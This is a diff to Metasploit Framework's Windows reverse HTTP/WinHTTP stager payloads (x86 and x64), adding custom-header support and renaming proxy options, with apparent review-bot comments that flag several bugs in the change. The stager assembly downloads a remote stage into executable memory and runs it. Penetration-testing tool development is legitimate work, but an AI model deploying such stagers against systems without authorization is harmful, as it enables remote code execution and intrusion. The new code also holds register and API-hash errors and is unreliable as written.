@@ -366,6 +371,10 @@ class Msf::Payload::UUID self end + attr_accessor :registered + attr_accessor :timestamp + attr_accessor :name + attr_reader :arch attr_reader :platform diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 1c9b79b562..db89b7138d 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -27,17 +27,12 @@ module Payload::Windows::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # 
@@ -47,22 +42,23 @@ module Payload::Windows::ReverseHttp ds = opts[:datastore] || datastore conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space - conf[:url] = luri + generate_uri(opts) - conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + if self.available_space.nil? || required_space <= self.available_space + conf[:url] = luri + generate_uri(opts) + conf[:exitfunk] = ds['EXITFUNC'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -71,6 +67,22 @@ module Payload::Windows::ReverseHttp generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # 
@@ -138,10 +150,23 @@ module Payload::Windows::ReverseHttp # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -155,6 +180,7 @@ module Payload::Windows::ReverseHttp # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -181,6 +207,8 @@ module Payload::Windows::ReverseHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -222,10 +250,10 @@ module Payload::Windows::ReverseHttp push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. - push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments - ^ + ^ if proxy_enabled asm << %Q^ 
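Review bot: `space += 512` in the `@@ -138,10 +150,23 @@` hunk is a fixed allowance, but the header block emitted later is `get_custom_headers(ds)` whose length is known at generation time, so a long HttpCookie value could push the stager past the estimate while the `required_space <= self.available_space` check in generate still passes; if the datastore is reachable from required_space, the real length of the built header string (plus its NUL) could be added instead and the `# Custom headers? Ugh, impossible to tell` comment dropped. `asm_generate_ascii_array` is duplicated verbatim in the `@@ -137,10 +150,23 @@` hunk of lib/msf/core/payload/windows/x64/reverse_http.rb and, if there is a shared helper module for asm_generate_wchar_array (used by the WinHTTP modules in this commit), would sit better next to it. A one-line doc such as `# @return [String] comma-separated 0x.. byte literals, NUL-terminated, for use in a db directive` would make the output format explicit. The enclosing required_space method starts outside this hunk.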
@@ -238,7 +266,7 @@ module Payload::Windows::ReverseHttp ; LPCTSTR lpszProxyName (via call) push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ else @@ -249,7 +277,7 @@ module Payload::Windows::ReverseHttp push ebx ; LPCTSTR lpszProxyName (NULL) push ebx ; DWORD dwAccessType (PRECONFIG = 0) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ end @@ -267,10 +295,10 @@ module Payload::Windows::ReverseHttp db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) - push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi - ^ + ^ # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it # doesn't set the Proxy-Authorization header on the CONNECT request. @@ -286,7 +314,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -302,7 +330,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')} call ebp ^ end 
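Review bot: The proxy-password block in the `@@ -302,7 +330,7 @@` hunk now pushes the hash for `HttpAddRequestHeaders` where the removed line resolved `InternetSetOptionA`, yet the arguments set up just above it (`push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)`, `push esi ; hConnection`) are still those of InternetSetOptionA, so the stager would invoke the wrong wininet export whenever a proxy password is configured. The sibling username block in the preceding hunk keeps `InternetSetOptionA`, which points to a copy/paste slip rather than an intended change. The line should read `push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}`. The enclosing asm_reverse_http method starts and ends outside this hunk.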
@@ -317,7 +345,7 @@ module Payload::Windows::ReverseHttp push edi ; server URI push ebx ; method push esi ; hConnection - push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ @@ -334,7 +362,6 @@ module Payload::Windows::ReverseHttp send_request: ^ - if opts[:ssl] asm << %Q^ ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); @@ -345,7 +372,7 @@ module Payload::Windows::ReverseHttp push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -354,17 +381,32 @@ module Payload::Windows::ReverseHttp httpsendrequest: push ebx ; lpOptional length (0) push ebx ; lpOptional (NULL) - push ebx ; dwHeadersLength (0) - push ebx ; lpszHeaders (NULL) + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ + push ebx ; HeadersLength (0) + push ebx ; Headers (NULL) + ^ + end + + asm << %Q^ push esi ; hHttpRequest - push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds - push 0xE035F044 ; hash( "kernel32.dll", "Sleep" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ 
@@ -404,7 +446,7 @@ module Payload::Windows::ReverseHttp push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -418,7 +460,7 @@ module Payload::Windows::ReverseHttp push 8192 ; read length push ebx ; buffer push esi ; hRequest - push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index c6f1eb838b..380a3141da 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -21,7 +21,7 @@ module Payload::Windows::ReverseWinHttp def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end 
@@ -29,24 +29,26 @@ module Payload::Windows::ReverseWinHttp # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['HttpProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -93,6 +95,9 @@ module Payload::Windows::ReverseWinHttp # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 * 2 + # The final estimated size space end 
@@ -167,6 +172,8 @@ module Payload::Windows::ReverseWinHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -434,8 +441,23 @@ module Payload::Windows::ReverseWinHttp push ebx ; TotalLength [6] push ebx ; OptionalLength (0) [5] push ebx ; Optional (NULL) [4] + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) [3] + call get_req_headers ; lpszHeaders (pointer to the custom headers) [2] + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ push ebx ; HeadersLength (0) [3] push ebx ; Headers (NULL) [2] + ^ + end + + asm << %Q^ push esi ; HttpRequest handle returned by WinHttpOpenRequest [1] push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} call ebp diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index a9048731b4..d42d3497f2 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb 
@@ -27,17 +27,12 @@ module Payload::Windows::ReverseHttp_x64 # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end def transport_config(opts={}) 
@@ -52,22 +47,23 @@ module Payload::Windows::ReverseHttp_x64 conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # add extended options if we do have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -76,6 +72,22 @@ module Payload::Windows::ReverseHttp_x64 generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # @@ -89,6 +101,7 @@ module Payload::Windows::ReverseHttp_x64 pop rbp ; rbp now contains the block API pointer #{asm_reverse_http(opts)} ^ + Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string end 
@@ -137,10 +150,23 @@ module Payload::Windows::ReverseHttp_x64 # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -154,6 +180,7 @@ module Payload::Windows::ReverseHttp_x64 # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -180,6 +207,8 @@ module Payload::Windows::ReverseHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 set_option_flags = 0 @@ -327,17 +356,15 @@ module Payload::Windows::ReverseHttp_x64 if retry_count > 0 asm << %Q^ - push #{retry_count} - pop rdi + push #{retry_count} + pop rdi ^ end - asm << %Q^ retryrequest: ^ - if opts[:ssl] asm << %Q^ internetsetoption: 
@@ -351,15 +378,30 @@ module Payload::Windows::ReverseHttp_x64 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp + + xor r8, r8 ; dwHeadersLen (0) ^ end - asm << %Q^ - httpsendrequest: - mov rcx, rsi ; hRequest (request handle) + if custom_headers + asm << %Q^ + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + pop rdx ; lpszHeaders + dec r8 ; dwHeadersLength (assume NULL terminated) + ^ + else + asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) - xor r8, r8 ; dwHeadersLen (0) + ^ + end + + + asm << %Q^ + mov rcx, rsi ; hRequest (request handle) + xor r9, r9 ; lpszVersion (NULL) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwOptionalLength (0) diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb index 7ba6de3b35..419946be1e 100644 --- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb @@ -22,7 +22,7 @@ module Payload::Windows::ReverseWinHttp_x64 def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end 
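Review bot: `xor r8, r8 ; dwHeadersLen (0)` has moved inside the `if opts[:ssl]` block (it is added just before that block's closing `^ end`) while the unconditional `xor r8, r8` on the old lpszHeaders (NULL) path is removed, so on the non-SSL path r8 is never cleared before HttpSendRequestA: with custom headers `dec r8` then yields an arbitrary dwHeadersLength instead of -1, and without them a NULL lpszHeaders is paired with a stale length (unless r8 is known to be zero from code outside the hunk). The same relocation appears in the `@@ -431,15 +444,29 @@` hunk of lib/msf/core/payload/windows/x64/reverse_winhttp.rb. Emit the zeroing in the common block instead, i.e. remove it from the SSL block and put `xor r8, r8 ; dwHeadersLength (0)` as the first line after the SSL block's `end` and before `if custom_headers`, so both branches start from zero. The added `xor r9, r9 ; lpszVersion (NULL)` also duplicates the context line directly below it, and one copy should go; asm_reverse_http continues outside this hunk.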
@@ -30,24 +30,26 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['HttpProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -95,6 +97,9 @@ module Payload::Windows::ReverseWinHttp_x64 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end 
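Review bot: The allowance in the `@@ -95,6 +97,9 @@` hunk is `space += 512`, but this module encodes the headers with `asm_generate_wchar_array` (see the following hunk), so each character costs two bytes, and the x86 counterpart in lib/msf/core/payload/windows/reverse_winhttp.rb reserves `512 * 2` for the same input; the estimate here is half of that. Use `space += 512 * 2` to match, or better derive it from the actual header string if the datastore is available in required_space. required_space starts outside this hunk.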
@@ -115,12 +120,18 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate an assembly stub with the configured feature set and options. # # @option opts [Bool] :ssl Whether or not to enable SSL - # @option opts [String] :uri The URI to request during staging + # @option opts [String] :url The URI to request during staging # @option opts [String] :host The host to connect to # @option opts [Integer] :port The port to connect to - # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [String] :proxy_host The optional proxy server host to use + # @option opts [Integer] :proxy_port The optional proxy server port to use + # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS + # @option opts [String] :proxy_user The optional proxy server username + # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up + # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # def asm_reverse_winhttp(opts={}) @@ -169,6 +180,8 @@ module Payload::Windows::ReverseWinHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0x00000100 # WINHTTP_FLAG_BYPASS_PROXY_CACHE secure_flags = ( 0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID 
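Review bot: The YARD change in the `@@ -115,12 +120,18 @@` hunk renames the option doc from `:uri` to `:url`, but generate in this module still populates `conf[:uri] = luri + generate_uri`, so the documentation now names a key the code does not use; keep `# @option opts [String] :uri The URI to request during staging`. The `:verify_cert_hash` line is removed although generate still sets `conf[:verify_cert_hash]`, and `:retry_wait` is added without a consumer visible in this hunk, so both should be checked against the body of asm_reverse_winhttp, which lies outside the hunk.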
@@ -431,15 +444,29 @@ module Payload::Windows::ReverseWinHttp_x64
 pop r9 ; dwBufferLength (4 = size of flags)
 mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
 call rbp
+
+ xor r8, r8 ; dwHeadersLen (0)
 ^
 end
 
- asm << %Q^
- winhttpsendrequest:
- mov rcx, rsi ; hRequest (request handle)
+ if custom_headers
+ asm << %Q^
+ call get_req_headers ; lpszHeaders (pointer to the custom headers)
+ db #{custom_headers}
+ get_req_headers:
+ pop rdx ; lpszHeaders
+ dec r8 ; dwHeadersLength (assume NULL terminated)
+ ^
+ else
+ asm << %Q^
 push rbx
 pop rdx ; lpszHeaders (NULL)
- xor r8, r8 ; dwHeadersLen (0)
+ ^
+ end
+
+
+ asm << %Q^
+ mov rcx, rsi ; hRequest (request handle)
 xor r9, r9 ; lpszVersion (NULL)
 push rbx ; stack alignment
 push rbx ; dwContext (0)
diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index c8a3e0629f..a54fb39482 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -298,7 +298,7 @@ module Msf
 # @return [String] Java payload as a JAR or WAR file
 def generate_java_payload
 payload_module = framework.payloads.create(payload)
- payload_module.datastore.merge!(datastore)
+ payload_module.datastore.import_options_from_hash(datastore)
 case format
 when "raw", "jar"
 if payload_module.respond_to? :generate_jar
diff --git a/lib/msf/core/post/windows/ldap.rb b/lib/msf/core/post/windows/ldap.rb
index bcb756e232..466dd736d5 100644
--- a/lib/msf/core/post/windows/ldap.rb
+++ b/lib/msf/core/post/windows/ldap.rb
@@ -119,7 +119,7 @@ module LDAP
 domain ||= get_domain
 
 if domain.blank?
- raise RuntimeError, "Unable to find the domain to query."
+ raise "Unable to find the domain to query."
 end
 
 if load_extapi
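Review bot: The `xor r8, r8` that zeroes dwHeadersLength was moved into the preceding `%Q^` block, which the `^ end` context shows is closed by a conditional whose head lies outside the hunk; whenever that branch is not taken, the no-headers path hands WinHttpSendRequest whatever r8 last held, and the custom-headers path runs `dec r8` on that stale value instead of producing -1. Zero the register in both branches instead: insert `xor r8, r8 ; dwHeadersLength (0)` directly before `dec r8`, keep `xor r8, r8 ; dwHeadersLen (0)` after `pop rdx` in the else block, and drop the copy added to the conditional block. The removed `winhttpsendrequest:` label is not re-emitted anywhere on the new side; if a retry path elsewhere in the stub jumps to it, the assembly will no longer resolve. The enclosing method starts and ends outside the hunk.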
@@ -338,7 +338,7 @@ module LDAP
 init_result = wldap32.ldap_sslinitA(domain, 389, 0)
 session_handle = init_result['return']
 if session_handle == 0
- raise RuntimeError.new("Unable to initialize ldap server: #{init_result["ErrorMessage"]}")
+ raise "Unable to initialize ldap server: #{init_result["ErrorMessage"]}"
 end
 
 vprint_status("LDAP Handle: #{session_handle}")
@@ -352,7 +352,7 @@ module LDAP
 bind = bind_result['return']
 unless bind == 0
 wldap32.ldap_unbind(session_handle)
- raise RuntimeError.new("Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}")
+ raise "Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}"
 end
 
 if (block_given?)
diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 869e129261..084f9acec7 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -194,7 +194,7 @@ module Msf::Post::Windows::Priv
 #
 def is_high_integrity?
 il = get_integrity_level
- (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system])
+ (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SID[:system])
 end
 
 #
diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb
index 6459c47479..3833fdfa37 100644
--- a/lib/msf/core/post/windows/services.rb
+++ b/lib/msf/core/post/windows/services.rb
@@ -78,7 +78,7 @@ module Services
 # );
 manag = advapi32.OpenSCManagerA(machine_str,nil,access)
 if (manag["return"] == 0)
- raise RuntimeError.new("Unable to open service manager: #{manag["ErrorMessage"]}")
+ raise "Unable to open service manager: #{manag["ErrorMessage"]}"
 end
 
 if (block_given?)
@@ -115,7 +115,7 @@ module Services
 def open_service_handle(manager, name, access)
 handle = advapi32.OpenServiceA(manager, name, access)
 if (handle["return"] == 0)
- raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}")
+ raise "Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}"
 end
 
 if (block_given?)
